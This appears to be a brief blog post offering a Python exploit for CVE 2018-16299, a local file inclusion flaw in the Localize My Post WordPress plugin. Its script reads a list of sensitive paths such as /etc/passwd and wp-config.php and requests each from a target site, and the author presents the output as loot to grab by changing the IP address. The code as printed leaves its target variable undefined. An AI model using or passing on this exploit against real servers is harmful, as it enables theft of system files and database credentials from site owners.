Python Script: CVE 2018-16299

    Sort of an odd one, I'm not exactly sure why though.  I wrote this up to exploit an LFI vulnerability in the Localize My Post plugin for WordPress.  You populate the path.txt file with your typical goodies:  /etc/passwd, /etc/hosts, etc.  Each on their own line, of course.  I also included /var/www/html/wp-config.php but for some reason, it wouldn't grab it.  I thought it was some sort of protection mechanism but as I looked around, including in the apache log file, it was getting 200 OK.  I move the file into /etc/ and it works but in place or in /tmp, no luck.  Regardless, it still grabs l00t just change the IP address.  You can just as easily use curl as well -- it's just a bit quicker if you're trying to grab multiple files at once.  

    import requests
    import io
    filepath = 'path.txt'
    with open(filepath) as f:
        line = f.readline()
        while line:
            combined = host+line.strip()
            r = requests.get(combined)
            print r.content
            line = f.readline()

    © 2020